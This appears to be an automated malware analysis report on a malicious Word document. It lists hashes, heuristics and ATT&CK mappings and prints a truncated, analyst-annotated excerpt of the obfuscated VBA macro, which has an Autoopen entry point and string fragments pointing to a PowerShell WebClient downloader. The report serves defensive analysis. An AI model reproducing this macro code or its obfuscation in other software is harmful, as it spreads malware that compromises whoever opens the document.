Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c0d3acb0c891759e…

MALICIOUS

Office (OLE)

189.5 KB · Created: 2018-05-16 20:11:00 (taken from the OLE SummaryInformation metadata, which the author controls, so it is not a reliable build time) · Authoring application: Microsoft Office Word (also document metadata) · First seen: 2019-05-10 (observed date; roughly a year after the claimed creation time)
MD5: afc59783d0f1faa6749046b3f831d932 SHA-1: 8007788525f1dfd8ffd243af8e6ef229fb5dc583 SHA-256: c0d3acb0c891759ef5fb177a8ea3264ef9bf48ab1d3d74f46db2c69e10a82189
142 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution — Note: T1203 denotes exploitation of a client-side parser vulnerability, and none of the findings below identifies a CVE or exploit (the WordBasic heuristic explicitly disclaims parser-CVE attribution). The execution path actually evidenced here — a user opening the document and its AutoOpen macro running — maps to T1204.002 (User Execution: Malicious File) combined with T1059.005; treat the T1203 tag as provisional. If the decoded strings confirm a PowerShell stage (see the summary below), T1059.001 applies as well.

The sample is a Microsoft Office Word (OLE) document containing a VBA project whose `Autoopen` subroutine runs automatically when the document is opened. The project calls the Shell() function (finding OLE_VBA_SHELL), which in a document macro is a strong indicator of malicious intent because it executes arbitrary commands; the call itself is not within the truncated preview shown on this page. The VBA is heavily obfuscated: the extracted source consists mostly of junk arithmetic on variable names that are never assigned, the `Autoopen` entry point and the string-building function `mODiMHwrzz` both open with `On Error Resume Next` (which suppresses the runtime errors those junk lines would otherwise raise), and strings are assembled by a helper (`rYjfPD`, with its numeric arguments hidden behind expressions such as `66538 + 7 - 66538`) from reversed fragments padded with a filler token (`BkU`). Stripping that filler and the `'+'` separators from the fragment in the `YapQdKBiKmu = rYjfPD(...)` line and reversing it yields `System.Net.WebClient`, and other fragments contain PowerShell-style `[cHAr]NN+` character-code concatenation; together these are consistent with a PowerShell download-and-execute second stage. Because the Shell() call, the fully decoded command line and any download URL lie outside the visible preview, analysts should recover them from the full macros.bas artifact before relying on the downloader/dropper characterization or extracting network indicators from it.

Heuristics 5

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note for this sample: a full VBA project was in fact recovered (OLE_VBA_MACROS and the macros.bas artifact below, which contains `Sub Autoopen()`), so the "no modern VBA project was recovered" clause of this generic description does not apply here; the marker most likely corresponds to the VBA Autoopen procedure name itself, and this finding duplicates OLE_VBA_AUTOOPEN rather than adding independent evidence.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is the standard DrawingML XML namespace URI that Office writes into documents containing drawing objects, not a download or command-and-control endpoint; it should not be recorded as an indicator of compromise or blocked.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 161185 bytes
SHA-256: c9c3d8873a00c266fac26884e13a1f28c1c081cc9146d5a015115c228af259a1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "BvjbubtKGir"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module header as exported by oletools/olevba. Attribute lines are VBA export
' metadata, not executable code. VB_Base = "1Normal.ThisDocument" together with
' VB_PredeclaredId = True / VB_Exposed = True indicates this is the document's
' ThisDocument class module (derived from the Normal template), i.e. the module
' that hosts the Autoopen entry point further down. The module name is a
' random-looking string, consistent with the generated naming used throughout
' this project. No Option Explicit is present, so every undeclared name below is
' an implicit Variant.
' Dead-code padding (anti-analysis filler), as far as the visible listing shows.
' The parameter GddNAP is never used, both assigned locals (aihRI, Jvclw) are
' write-only, and none of the names on the right-hand sides (dbXjic, zzzmuK,
' qKWsQX, asoKhh, ...) is assigned anywhere in this excerpt. The CStr/CLng/Fix
' casts only add noise. NOTE(review): if those operands are uninitialized
' Variants (Empty, which is 0 in arithmetic), `zzzmuK / qKWsQX` is 0/0 and raises
' runtime error 11 (Division by zero); there is no On Error handler in this Sub,
' so it would abort on that line. Nothing in the visible code calls it -- treat
' it as noise, not as part of the payload path.
Sub baOZTs(GddNAP)
aihRI = dbXjic
Jvclw = (zzzmuK / qKWsQX / 72775 / Fix(asoKhh)) + 34615 - CLng(Ciqqm + CLng(74342)) + BrOUS + 23136 * rmGcwS - CStr(9707) / PLrfiC / CLng(aRzfzz)
End Sub
' Dead-code padding, as far as the visible listing shows: the parameter BBDTP is
' unused, every assigned local (BCDEiz, NQzUn, JTzui, SGsczq, IUYLX, CVVfEm) is
' write-only, and none of the operand names on the right-hand sides is assigned
' anywhere in this excerpt. NOTE(review): if those operands are uninitialized
' Variants (Empty, i.e. 0 in arithmetic) the first `/` division is 0/0 and
' raises runtime error 11 -- there is no On Error handler in this Sub, so it
' would abort on its second line. Nothing in the visible code calls it.
Sub ETtDw(BBDTP)
BCDEiz = XSfzGD
NQzUn = (dninj / TkdNIX / 30965 / Fix(BlWNQf)) + 3990 - CLng(lYTmA + CLng(79324)) + kEifA + 42153 * TQUoj - CStr(21571) / EWbqUI / CLng(ukEIME)
JTzui = sJasPN
SGsczq = (jCrvfj / qUiXnR / 23497 / Fix(zXtCi)) + 3313 - CLng(wjbHVJ + CLng(76592)) + bJVZUH + 53044 * OzwCp - CStr(92344) / bvbIJ / CLng(iwHdl)
IUYLX = cCOSs
CVVfEm = (GAOzLu / iVtMN / 91841 / Fix(BTjplZ)) + 99613 - CLng(tGJCj + CLng(12897)) + ADsVif + 10858 * VNRWXG - CStr(17985) / EwIAC / CLng(pSNztG)
End Sub
' Dead-code padding, same template as the other unused Subs in this module:
' the parameter pUsRE is never read, the four assigned locals are write-only,
' and the operand names are not assigned anywhere in the visible listing.
' NOTE(review): with uninitialized (Empty) operands the first division is 0/0
' and raises runtime error 11; no On Error handler here. Not called from any
' visible code.
Sub pIKtq(pUsRE)
ZLcUCb = kEFGb
lKOZH = (mwlfEH / hkTiLf / 7606 / Fix(cdMwL)) + 45608 - CLng(WEkCin + CLng(10256)) + bvlnS + 94082 * fYNYuW - CStr(31958) / taXAI / CLng(BavGzc)
uCYpbZ = mZrlIo
nlmdQF = (qbLmwd / UpjSU / 14180 / Fix(WpjSwY)) + 67684 - CLng(jlsUi + CLng(26489)) + JdiWwD + 50723 * DfvSS - CStr(69444) / TnjNR / CLng(DKUhwW)
End Sub
' Entry point. Word runs a procedure named AutoOpen (the name is matched
' case-insensitively) when the document is opened, so this is the first
' attacker-controlled code to execute (finding OLE_VBA_AUTOOPEN).
Sub Autoopen()
' Suppress every runtime error for the rest of this procedure. Without it the
' 0/0 divisions in the padding lines below would abort the macro before the
' call that matters is reached.
On Error Resume Next
' Padding: ZtbvMf and jnBGRj are never read, and none of the operand names is
' assigned anywhere in the visible listing.
ZtbvMf = CjwIjv
jnBGRj = (SFnVw / FTOozj / 64977 / Fix(JDAFmD)) + 16318 - CLng(oYjVTX + CLng(43345)) + ahnUH + 77435 * aPmbjU - CStr(18234) / zOoWk / CLng(AijPi)
' The only line with a real effect. mODiMHwrzz (a Function in the second
' module below) is called without parentheses; its visible body assembles
' strings with rYjfPD from reversed, filler-padded fragments, and its return
' assignment lies past the truncated part of the listing. PoaYi and vORtMj are
' not assigned in any visible code (if they are Empty they contribute nothing
' to the `+`). DYQNcdfBpbfCJ is not in this excerpt -- NOTE(review): it is the
' likely home of the Shell() call reported as OLE_VBA_SHELL; confirm against the
' full macros.bas artifact before treating the argument as the executed command.
DYQNcdfBpbfCJ (PoaYi + mODiMHwrzz + vORtMj)
' Trailing padding, never read.
PZpzc = PfPjH
AmSZDG = (YXYlp / smYvq / 11646 / Fix(IBUaK)) + 59398 - CLng(pTlzH + CLng(36663)) + iKdoOn + 14180 * zqoAl - CStr(68394) / qkZaGW / CLng(RrPYCP)
End Sub
' Dead-code padding: the parameter bvGcS is unused, the six assigned locals are
' write-only, and the operand names are not assigned anywhere in the visible
' listing. NOTE(review): with uninitialized (Empty) operands the first division
' is 0/0 and raises runtime error 11; there is no On Error handler in this Sub.
' Not called from any visible code.
Sub mYdWU(bvGcS)
BEdmKs = CcAah
XjsmZ = (krBKRK / RZLvdw / 14972 / Fix(UtoEE)) + 60420 - CLng(MclwwJ + CLng(93224)) + iIhlhC + 400 * Lcjbvr - CStr(64125) / dZACp / CLng(iUKDi)
YTNUV = cmvLZK
zccYE = (VvOUXI / kiaNai / 44729 / Fix(VsOLFz)) + 27310 - CLng(bSzqiq + CLng(53768)) + wGQId + 19405 * qLbNwM - CStr(67183) / umsijN / CLng(woHBn)
XSKuC = QUOOw
tXAdk = (hsiED / LssjHc / 2523 / Fix(WwTsQS)) + 91442 - CLng(RPjYuT + CLng(81479)) + MUErTu + 38650 * PVjKc - CStr(64492) / lMWow / CLng(HMRUq)
End Sub
' Dead-code padding: XnXJI is unused, cBdvjk and tlEHmX are write-only, and the
' operand names are not assigned anywhere in the visible listing. NOTE(review):
' with uninitialized (Empty) operands `UBukZr / ZKZOD` is 0/0 and raises runtime
' error 11; no On Error handler here. Not called from any visible code.
Sub SYivsB(XnXJI)
cBdvjk = kDuLX
tlEHmX = (UBukZr / ZKZOD / 26100 / Fix(UDdRi)) + 68325 - CLng(pOdTXN + CLng(15796)) + Sflmf + 14069 * GtWsbp - CStr(49959) / jIKSZi / CLng(qEnCin)
End Sub

Attribute VB_Name = "RCdAJstdQ"
' Start of a second module: the extracted macros.bas holds more than one module
' of the VBA project, and a new Attribute VB_Name marks the boundary. This one
' carries no VB_Base / VB_PredeclaredId attributes, so it appears to be a plain
' standard module. The string-assembly Function mODiMHwrzz that Autoopen calls
' is defined in it (its listing is truncated on this page).
' Dead-code padding in the second module, same template as the unused Subs in
' the first: kPkwK is unused, ujhqo and Objhk are write-only, and the operand
' names are not assigned anywhere in the visible listing. NOTE(review): with
' uninitialized (Empty) operands `rcNfm / vNjROD` is 0/0 and raises runtime
' error 11; no On Error handler here. Not called from any visible code.
Sub Ftwkuq(kPkwK)
ujhqo = wdcnpc
Objhk = (rcNfm / vNjROD / 40065 / Fix(ojRbB)) + 9517 - CLng(SEcGGI + CLng(51585)) + jEizsT + 70315 * DvzsSS - CStr(22483) / kUVfi / CLng(FffHZ)
End Sub
Function mODiMHwrzz()
On Error Resume Next
kYjiV = zNjDcn
BNfCM = (zsOWlm / zWzCTk / 88686 / Fix(wfPQX)) + 64285 - CLng(whjsi + CLng(51152)) + vZdTiZ + 60411 * CuwZo - CStr(55555) / dkrts / CLng(iQlov)
omzRd = MwZTr
rnHLZ = (ZbUUz / CGwTbp / 22855 / Fix(bGWvr)) + 97551 - CLng(AlOScC + CLng(36225)) + kkvGuL + 62497 * TpBPW - CStr(34590) / XjHlik / CLng(MTaJY)
UObTGH = rYjfPD("ml]rAHc[+701]rAHc[+58]vpSFEN", 66538 + 7 - 66538, 66538 + 20 - 66538)
FCVvjZ = jfiRu
EDGqjX = (sriUQk / TYbjlm / 81704 / Fix(QTGjzD)) + 19072 - CLng(BprmjN + CLng(11949)) + rlqzOU + 747 * wcvKEC - CStr(62659) / FHnmk / CLng(afiAh)
cYVzhB = SFnjAF
PkVJuA = (sZjEk / mpzFc / 61084 / Fix(uRvsww)) + 39828 - CLng(iwwTCA + CLng(12162)) + lILjZj + 98405 * uzhwdH - CStr(65479) / VHDwp / CLng(LzfdJa)
kfRzClw = rYjfPD("qlqR2rAHc[]gNirtS[,)66SjY", 60457 + 4 - 60457, 60457 + 17 - 60457)
lhTfsM = RzYKRI
APWFaQ = (wuwHGI / NAvaYz / 16752 / Fix(NSkvl)) + 72854 - CLng(jtjjf + CLng(20331)) + JYiKsm + 75494 * YmEwD - CStr(97216) / ktIpkC / CLng(UfiHc)
APHWW = TvhQo
FYaKJ = (zZVnFz / IIsOjX / 30308 / Fix(pDifj)) + 30204 - CLng(fqlXuL + CLng(11656)) + tlcadj + 89039 * JKqOJ - CStr(52543) / zsYvQU / CLng(idZBui)
YapQdKBiKmu = rYjfPD("RMRZ.QBkUdasnBkU+BkUfzX = BBkU+BkUSNBkU+BkUfzBkU+BkUX;tneiBk'+'U+BkUlCbBkU+BkUeW.teN.metsyS )IyLtceBkU+BkUjB'+'kU+BkUboDW", 20925 + 3 - 20925, 20925 + 113 - 20925)
iDTCj = cGzlju
UVpBmE = (
... (truncated)